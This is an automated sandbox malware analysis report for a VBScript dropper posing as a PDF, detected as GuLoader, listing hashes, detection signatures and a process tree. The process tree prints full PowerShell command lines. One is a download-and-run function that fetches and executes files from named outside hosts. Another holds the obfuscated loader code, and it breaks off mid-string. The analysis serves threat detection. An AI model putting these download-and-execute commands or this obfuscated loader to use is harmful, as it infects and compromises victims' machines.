Edit tour
Windows
Analysis Report
List of required items pdf.vbs
Overview
General Information
| Sample name: | List of required items pdf.vbs |
| Analysis ID: | 1571488 |
| MD5: | 1fee8d135b538567e24faa39b34f0f29 |
| SHA1: | 7fb4d867634326ceac236efdc53a254950ff7890 |
| SHA256: | 9518df13e375c4e3926979ddda32a1a11b94eb928364f9b45f35970ac82ee6e2 |
| Tags: | 185-236-228-92vbsuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7160 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\List of require d items pd f.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6880 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command f unction Do wnloadAndR un([string ]$url, [st ring]$dest ination) { Invoke-We bRequest - Uri $url - OutFile $d estination ; Start-P rocess -Fi lePath $de stination -Wait };Do wnloadAndR un -url 'h ttps://www .astenterp rises.com. pk/it/it.v bs' -desti nation 'C: \Users\Pub lic\tk4f2q xkb.vbs';D ownloadAnd Run -url ' https://ww w.fornid.c om/ab/List %20of%20re quired%20i tems.xlsx' -destinat ion 'C:\Us ers\Public \bsxhli2ob .xlsx' MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 5080 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 2660 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \tk4f2qxkb .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
WMIC.exe (PID: 3160 cmdline: wmic diskd rive get c aption,ser ialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 4260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4352 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" ";$Columbu sgs='Reall nningernes ';;$Cares= 'Doegling' ;;$Novela= 'Dyrkere55 ';;$Pigesj ovetridioc yte='Teist er';;$peac efuller=$h ost.Name;f unction Mu ltiplum($P ousserer){ If ($peace fuller) {$ Exitskilte s=2} for ( $Pigesjove t=$Exitski ltes;;$Pig esjovet+=3 ){if(!$Pou sserer[$Pi gesjovet]) {cls;break }$Vandsta nde+=$Pous serer[$Pig esjovet];$ Fiskeinter essernes=' Unmoralise s'}$Vandst ande}funct ion Unchan neled($Pig esjovetmmu notoxin){ .($instrum entalis) ( $Pigesjove tmmunotoxi n)}$Kvabse rne=Multip lum 'SpnOr eActdu.D.W ';$Kvabser ne+=Multip lum 'AvE b PscMalDeIC ESlnCeT'; $Bugfish=M ultiplum ' fM.joD.zB eiLalAslF a i/';$Exo sperm=Mult iplum 'OpT StlSksRa1 .2';$Bagpr ojektion12 1='go[.an, oESltAd.Os sK e,ar,aV AiGrC,fe OP poslIMa nTeT.rm rA DdNP,a UgD aE,lrv.].j :,u: ,sS E MuCCeuRyrR .iRetK.YBa p NRU o Tt UoHect OA nL H= .$ S eRoX lO ss Mip nEVaRV am';$Bugfi sh+=Multip lum 'Ar5R .Kn0.o (g jWFoiP nM. d roBewdrs , VoNStTs Rv1Un0Re. Dr0V,;T Ut WstiAnn,e6 P,4Br; S S ux 6 N4En; T .urD vSt : E1Pr3Co1 r .D.0s )F l BaG eeR c GkPaoEn/ Ja2 s0 U1f u0 C0L,1 l 0Ha1Wa oF .iMirMleFu fu osuxFo/ M1M 3.k1n y.sn0';$Wh itefishery =Multiplum ',iuCiS y eHurVe- oA UngGhEIbN Rt';$Knyst en=Multipl um 'Vah it ,t,tp.is S:Fr/Ec/,r wMewSew,i. .epGuuBenS peF.eretSl .,gaS e E/ Hei.nt S/A nKKoo Gn u tJvrPeaScs nt nrPai .g tsh.L m Ses o n>N. hU t t ApC osCo: S/On / rwL,wBlw U.Prf VtB esH e n hg Gei inCaeF ieJ rFrs t . .cV o Lm P /gei ItC l/MiKCaoOr n otEmrAna A sTotP r, miByg,itVe .HamB s Eo ';$Tikrone sedler=Mul tiplum 'Sm >';$instru mentalis=M ultiplum ' SpISpe vX' ;$Ribboned 46='Treate r';$fabrik svarerne=' \Pharmacis ts201.Str' ;Unchannel ed (Multip lum 'un$Ch g yL uO .B Gea VLTi:S isVsAB L a TDvI CNBte Rs T=,n$ E HN.aVA.: GrAOvp ,PS rd CaS,TR aHn+ t$Unf PrASeBUdRM aI KByS EV ReAInrA e krRaN oE') ;Unchannel ed (Multip lum 'Af$Sp GCaL aoI B ElA rLRo:, as JInUs S .jKseeGim rI.lK,pkVo eLilPa= D$ D.KSanS.YH aSTit EMen st. s .Pbo LdiIVit,a( As$U T riE nks,r Uo.a NFeeExsBre ADKolO.E. rRSy)');Un channeled (Multiplum $Bagproje ktion121); $Knysten=$ Sjuskemikk el[0];$Thy reoid=(Mul tiplum ' l $P gN,lSlO F,BHaAPelO v:PeI.oN v aAPoLToIR ed FET,f O DaRAasN I akM.R GILe nD G U=EnN oE IW -Re o .bKnJNuE dCPuT,c A S rYLaSI, tBreDrm a. H.$ Ak vno ABoB es e PR hnKaE') ;Unchannel ed ($Thyre oid);Uncha nneled (Mu ltiplum 'P r$ PISan v aa l ,i a d eCofthoB irBisT,iRe k or i fnP egUn.M Hpr eCoa dAfe DrSlss [by $ WLah Fi BtF eHef D iAds ohCoe Arr yIo]Ce =W $ToBTiu P.g yf ,iF sUnh');$R eedmaker=M ultiplum ' r$RaIUsn RvSea,al a i,mdFleAff T oFirK sG liKok PrV, iAvnFrg a.